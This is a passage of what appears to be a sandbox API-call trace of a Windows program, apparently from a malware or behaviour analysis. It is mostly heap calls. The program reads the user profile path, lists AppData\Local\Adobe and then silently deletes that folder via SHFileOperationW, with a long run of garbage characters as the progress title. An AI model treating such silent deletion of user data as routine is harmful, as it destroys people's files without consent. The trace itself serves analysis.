hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0207.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0207.785] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0207.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0207.786] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0207.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0207.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0207.786] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0207.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0207.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0207.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x2417000 [0207.788] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Adobe", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpFilePart=0x8bedfc*="Adobe") returned 0x31 [0207.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0207.788] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe")) returned 0x2010 [0207.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf69, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5820 [0207.789] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf69, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0207.789] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf69, dwReserved1=0x4, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0207.789] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf69, dwReserved1=0x4, cFileName="Color", cAlternateFileName="")) returned 1 [0207.789] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf69, dwReserved1=0x4, cFileName="Color", cAlternateFileName="")) returned 0 [0207.789] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0207.789] GetLastError () returned 0x12 [0207.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0207.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0207.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0207.789] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0207.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0207.790] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0207.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0207.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0207.791] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0207.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0207.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0207.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0207.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0207.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0207.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0207.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x2417000 [0207.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Adobe", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpFilePart=0x8bf658*="Adobe") returned 0x31 [0207.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0207.793] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe")) returned 0x2010 [0207.793] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347